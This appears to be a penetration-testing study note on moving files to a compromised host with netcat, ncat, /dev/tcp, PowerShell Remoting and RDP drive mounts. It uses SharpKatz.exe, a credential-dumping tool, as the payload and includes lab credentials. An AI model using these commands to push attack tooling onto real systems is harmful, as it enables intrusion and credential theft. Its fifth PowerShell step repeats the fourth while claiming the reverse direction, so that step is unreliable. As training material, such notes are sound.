Skip to content

Misc

Netcat, ncat

Opening a port on the target:

Target - ncat -l -p 8000 --recv-only > SharpKatz.exe PWNBOX - nc -q 0 192.168.49.128 8000 < SharpKatz.exe OR - ncat --send-only 192.168.49.128 8000 < SharpKatz.exe

  • --send-only terminates the connection when the SharpKatz file is sent.
  • -q 0 will also terminate the connection once the file is sent

Opening a port on the PWNBOX:

PWNBOX - sudo nc -l -p 443 -q 0 < SharpKatz.exe Target - nc 192.168.49.128 443 > SharpKatz.exe OR using Ncat

PWNBOX - sudo ncat -l -p 443 --send-only < SharpKatz.exe Target - ncat 192.168.49.128 443 --recv-only > SharpKatz.exe

Using /dev/tcp:

Pwnbox - Send the file using nc or ncat Target - receive a file - cat < /dev/tcp/10.10.14.7/443 > SharpKatz.exe

Powershell Session

  • When transferring files with Powershell, HTTP, HTTPS and SMB is unavailable, we can use - Powershell Remoting aka WinRM for file transfers.
  • Allows execution of scripts, commands, file transfer on a remote comp
  • Enabling Powershell Remoting opens up TCP/5985 for HTTP and TCP/5986 for HTTPS listeners.
  • To create a PS Remoting session - either
    • need administrative access,
    • be a member of the Remote Management Users group,
    • have explicit permissions for PowerShell Remoting in the session configuration.

Commands:

  1. You have access to a host DC01 as an Administrator and has Admin rights on DATABASE01
  2. Test-NetConnection -ComputerName DATABASE01 -Port 5985
  3. $Session = New-PSSession -ComputerName DATABASE01
  4. Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\ - Copying file from local to remote.
  5. Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\ - Copying file from remote to local.

RDP:

Windows:

  • You can right click and copy files from the rdp session directly on the Windows Host.
  • To create a share folder, using RDP app and configure local resources.

Linux: using rdesktop and xfreerdp

Pwnbox - We create a mount folder and share it. - rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files' - xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer Target - To access the Directory, - In the RDP Session, go to Network > \\tsclient\linux

Note: This drive is not accessible to any other users logged on to the target computer, even if they manage to hijack the RDP session.